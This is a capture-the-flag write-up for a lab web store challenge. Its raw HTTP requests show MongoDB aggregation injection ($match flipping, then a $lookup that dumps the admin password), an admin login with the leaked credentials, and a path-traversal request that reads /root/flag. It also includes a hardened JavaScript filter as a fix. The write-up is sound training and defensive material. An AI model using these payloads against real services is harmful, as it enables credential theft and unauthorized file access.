Ghibli Store
Stage 001
BRIEFING
Difficulty: Introductory
We're working on a new Ghibli store to sell the cutest plush toys you'll find on the internet! We don't have all the products in stock yet, can you find the hidden item?
Challenge Host: http://ghibli.pwn.site:8035/
Work/Solution
Loading the link above fires off the following API request. Note that the request body carries the query stage itself.
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 37
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$match":{"instock":true}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1400
Date: Wed, 28 Feb 2024 19:26:16 GMT
Connection: close
{"status":true,"data":[{"_id":1,"name":"Teto Fox","description":"Castle in The Sky Teto Fox Squirrel Beanbag Stuffed Animal","price":"38.44","image":"teto.jpg","instock":true},{"_id":2,"name":"My Neighbor Totoro","description":"Studio Ghibli My Neighbor Totoro 30/40/50cm","price":"41.30","image":"totoro.jpg","instock":true},{"_id":3,"name":"Plush Toy Studio","description":"My Neighbor Totoro Plush Toy Studio","price":"42.81","image":"plush.jpg","instock":true},{"_id":4,"name":"Howl's Moving","description":"Enesco Howl's Moving Castle 11\" Heen Bean Bag Plush","price":"41.88","image":"hawl.jpeg","instock":true},{"_id":5,"name":"Spirited Away Haku","description":"Ghibli Miyazaki Hayao Plush Toy, Spirited Away Haku, 28 Cm, Cute Doll Stuffed, Plush Play Pillow, Small, White Dragon, U-Shaped Pillow","price":"45.53","image":"hak-u.jpg","instock":true},{"_id":6,"name":"Meichan M Plush Toy","description":"Studio Ghibli My Neighbor Totoro Meichan M Plush Toy, Height 17.7 inches","price":"48.88","image":"neighbor.jpg","instock":true},{"_id":7,"name":"Cat Bus Plush Doll","description":"30cm My Neighbor Totoro Cat Bus Plush Doll Catbus Soft Toy Stuffed Toy Gifts","price":"46.25","image":"bus.jpeg","instock":true},{"_id":8,"name":"Kiki's Delivery Service","description":"Kiki's Delivery Service Stuffed Exhausted size S Jiji /Studio Ghibli","price":"44.13","image":"kiki.jpg","instock":true}]}
So can we just flip the filter and query for the items that are not in stock?
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$match":{"instock":false}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 158
Date: Wed, 28 Feb 2024 19:27:27 GMT
Connection: close
{"status":true,"data":[{"_id":1337,"name":"flag","description":"flag{s1mpl3_m47ch_w45_4ll_1t_n33d3d}","price":"1337","image":"neighbor.jpg","instock":false}]}
flag{s1mpl3_m47ch_w45_4ll_1t_n33d3d}
Oh super easy.
Stage 002
BRIEFING
Difficulty: Medium
Oh my, did you find the secret product already? Well, we have an admin panel for the store, and you can log in from /login. Can you find the admin user's password as well and log in to the console?
Work/Solution
Attempt to log in with random credentials.
POST /api/login HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"admin","password":"admin"}
HTTP/1.1 401 Unauthorized
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 33
Date: Wed, 28 Feb 2024 19:29:48 GMT
Connection: close
{"message":"Invalid credentials"}
OK, how can I query the user information through this endpoint?
Got this from https://exploit-notes.hdks.org/exploit/database/mongodb-pentesting/.
# $lookup: join to a collection in the same database to filter in documents from the "joined" collection for processing.
{
  $lookup:
  {
    from: "users",
    localField: "_id",
    foreignField: "_id",
    as: "test"
  }
}
It just had to be dropped into the query object sent in the previous stage, in place of $match; the user record then came back joined into the first result.
POST /api/products HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"query":{"$lookup":{"from":"users","localField":"_id","foreignField":"_id","as":"test"}}}
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 1693
Date: Thu, 29 Feb 2024 19:46:35 GMT
Connection: close
{"status":true,"data":[{"_id":1,"name":"Teto Fox","description":"Castle in The Sky Teto Fox Squirrel Beanbag Stuffed Animal","price":"38.44","image":"teto.jpg","instock":true,"test":[{"_id":1,"username":"admin","password":"sup3r_s3cr37_p455w0rd_31337"}]},{"_id":2,"name":"My Neighbor Totoro",... ...}]}
Attempted to log in with the above credentials.
POST /api/login HTTP/1.1
Host: ghibli.pwn.site:8035
Content-Length: 61
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ghibli.pwn.site:8035
Referer: http://ghibli.pwn.site:8035/login
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"username":"admin","password":"sup3r_s3cr37_p455w0rd_31337"}
HTTP/1.1 200 OK
X-Powered-By: Express
Set-Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzA5MjM2MjA0fQ.KPfsGERr7PJpHDbhuegKopZ-LAqTIIlhSEqAXHpKJwA; Max-Age=3600; Path=/; Expires=Thu, 29 Feb 2024 20:50:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 36
Date: Thu, 29 Feb 2024 19:50:04 GMT
Connection: close
{"message":"Logged in successfully"}
The flag was shown on the /admin page once the redirect loaded.
flag{y0u_l00k3d_m3_up!?}
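Stages 001 and 002 both work because the server runs whatever pipeline stage the client puts in the request body. The following is an added example, not the challenge's own source: a hardened builder for /api/products that takes only a boolean instock filter from the client and assembles the aggregation stage server-side. Function and field names are hypothetical.

```javascript
// Added example, not the challenge's own source. The store's /api/products
// endpoint evidently executes whatever pipeline stage arrives in req.body.query,
// which is why swapping $match for $lookup joined the users collection into
// the product list. Function and field names here are hypothetical.

// Vulnerable shape, reconstructed from the observed behaviour (do not use):
//   const docs = await products.aggregate([req.body.query]).toArray();

// True if any key anywhere in the value is a MongoDB operator ('$...') or a
// dotted path, the two ways untrusted JSON turns into query syntax.
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === 'object') {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith('$') || k.includes('.') || containsOperator(v));
  }
  return false;
}

// Builds the only pipeline this endpoint should ever run. Throws on anything
// that is not a plain { instock: <boolean> } filter; instock defaults to true.
function buildProductsPipeline(untrusted) {
  if (untrusted === null || typeof untrusted !== 'object' || Array.isArray(untrusted)) {
    throw new TypeError('filter must be a JSON object');
  }
  if (containsOperator(untrusted)) {
    throw new TypeError('operators are not allowed in filter');
  }
  for (const key of Object.keys(untrusted)) {
    if (key !== 'instock') throw new TypeError(`unknown filter field: ${key}`);
  }
  const instock = Object.prototype.hasOwnProperty.call(untrusted, 'instock')
    ? untrusted.instock : true;
  if (typeof instock !== 'boolean') throw new TypeError('instock must be a boolean');
  return [{ $match: { instock } }];   // the client never supplies a stage
}

// Request-handler half: parse the raw body and map validation failures to a
// 400 instead of letting them reach the database.
function handleProductsBody(rawJson) {
  try {
    return { status: 200, pipeline: buildProductsPipeline(JSON.parse(rawJson)) };
  } catch (err) {
    return { status: 400, error: err.message };
  }
}
```

With this in place the bodies seen in the writeup, `{"query":{"$match":...}}` and `{"query":{"$lookup":...}}`, are both refused with a 400, and only `{"instock": true|false}` reaches MongoDB.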
Stage 003
BRIEFING
Difficulty: Hard
Impressive of you to have infiltrated our admin panel! Well, the admin panel is not fully ready yet and doesn't contain any major features, so we should be good, right? Right?? Just in case, we've hidden a flag inside a file.
Work/Solution
Stage 004
BRIEFING
Difficulty: Extreme
Work/Solution
Found an LFI (path traversal) in the admin export functionality: the file parameter is joined onto a directory and served without being checked.
GET /admin/export?file=../../../../../../../../../../../root/flag HTTP/1.1
Host: ghibli.pwn.site:8035
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://ghibli.pwn.site:8035/admin/database
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNzA5MjM2MjA0fQ.KPfsGERr7PJpHDbhuegKopZ-LAqTIIlhSEqAXHpKJwA
Connection: close
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Disposition: attachment; filename="flag"
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 27 Feb 2024 20:52:05 GMT
ETag: W/"1d-18dec56c187"
Content-Type: application/octet-stream
Content-Length: 29
Date: Thu, 29 Feb 2024 20:13:05 GMT
Connection: close
flag{y0u_B1nd3d_y0ur_w4y_in!}